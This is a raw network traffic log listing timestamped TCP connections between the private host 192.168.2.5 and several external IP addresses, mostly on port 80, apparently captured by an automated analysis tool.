Aug 31, 2024 15:44:19.334916115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.334927082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.334934950 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.334956884 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.335017920 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.335030079 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.335041046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.335069895 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.335084915 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.335171938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.335185051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.335222006 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.335232019 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.335243940 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.335274935 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.335275888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.335289001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.335299015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.335315943 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.335341930 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.335762978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.335815907 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.335817099 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.335828066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.335839033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.335855007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.335855007 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.335865021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.335875988 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.335887909 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.335917950 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.336062908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.336081982 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.336091042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.336096048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.336102009 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.336102962 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.336121082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.336132050 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.336133957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.336158991 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.336177111 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.336545944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.336558104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.336569071 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.336602926 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.336625099 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.336643934 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.336654902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.336666107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.336678982 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.336688995 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.336704969 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.336724997 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.337233067 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.337536097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.337547064 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.337558031 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.337569952 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.337579966 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.337587118 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.337590933 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.337608099 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.337641954 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.337690115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.337701082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.337712049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.337723017 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.337733030 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.337733984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.337744951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.337762117 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.337771893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.337774038 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.337779999 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.337783098 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.337785959 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.337795973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.337810040 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.337810040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.337822914 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.337832928 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.337835073 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.337846994 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.337872982 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.337888002 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.338470936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.338496923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.338524103 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.338541985 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.338557959 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.338568926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.338574886 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.338609934 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.338612080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.338624954 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.338629007 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.338637114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.338660955 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.338690996 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.339385033 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:19.344142914 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.377938032 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.377949953 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.377960920 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.377978086 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.378015995 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.378016949 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.378165007 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.378220081 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.378268003 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.378400087 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.378411055 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.378429890 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.378478050 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.378478050 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.421591043 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.421612024 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.421623945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.421633959 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.421646118 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.421648979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.421655893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.421668053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.421669006 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.421699047 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.421710014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.422029972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.422040939 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.422051907 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.422090054 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.422115088 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.422121048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.422132969 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.422143936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.422152996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.422164917 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.422177076 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.422204971 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.422852993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.422883034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.422904968 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.422928095 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.422965050 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423041105 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423053026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423083067 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.423100948 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.423166037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423177958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423187971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423197985 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423208952 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423218012 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.423221111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423233032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423245907 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.423259974 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.423283100 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.423326015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423346043 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423363924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423367977 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.423374891 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423387051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423391104 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.423398018 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423408985 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423418999 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.423420906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423429966 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.423434019 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423444986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423449993 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.423458099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423475981 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.423515081 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.423886061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423896074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423907042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423940897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.423950911 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.423974991 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423986912 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.423998117 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.424007893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.424020052 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.424036026 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.424062014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.424180031 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.424228907 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.424232960 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.424238920 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.424268961 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.424282074 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.424316883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.424329042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.424339056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.424350977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.424360991 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.424374104 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.424412012 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.425580978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.425635099 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.425668955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.425678015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.425693035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.425704956 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.425708055 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.425715923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.425723076 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.425731897 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.425741911 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.425744057 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.425755024 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.425765038 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.425791025 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.425827026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.425837994 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.425857067 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.425864935 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.425868034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.425879955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.425890923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.425895929 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.425921917 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.425961971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.426011086 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.426903009 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.426912069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.426949978 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.426968098 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.426976919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.426989079 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.427006960 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.427016973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.427018881 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.427027941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.427037954 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.427041054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.427047014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.427057981 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.427076101 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.427077055 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.427088976 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.427098989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.427104950 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.427115917 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.427135944 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.427144051 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.427172899 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.427180052 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.427191973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.427201986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.427212000 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.427222967 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.427227974 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.427236080 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.427247047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.427258968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.427267075 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.427269936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.427282095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.427287102 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.427310944 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.427335024 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.428117990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.428128958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.428139925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.428167105 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.428179979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.428191900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.428195000 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.428230047 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.428282022 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.428296089 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.428313017 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.428323030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.428332090 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.428334951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.428349018 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.428358078 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.428359985 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.428369999 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.428374052 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.428385019 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.428401947 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.428402901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.428415060 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.428427935 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.428432941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.428446054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.428447962 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.428474903 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.428486109 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.428498983 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.428499937 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.428509951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.428520918 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.428529978 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.428563118 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.429218054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.429228067 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.429239035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.429280996 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.429287910 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.429290056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.429301023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.429312944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.429322004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.429332972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.429333925 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.429344893 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.429363966 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.429387093 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.432919025 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.432929993 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.432945967 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.432955980 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.432979107 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.433022976 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.433319092 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.433372021 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.456754923 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:19.463265896 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:19.468050957 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:19.512500048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.512511969 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.512522936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.512540102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.512552023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.512562037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.512562990 CEST	49727	80	192.168.2.5	52.212.52.84
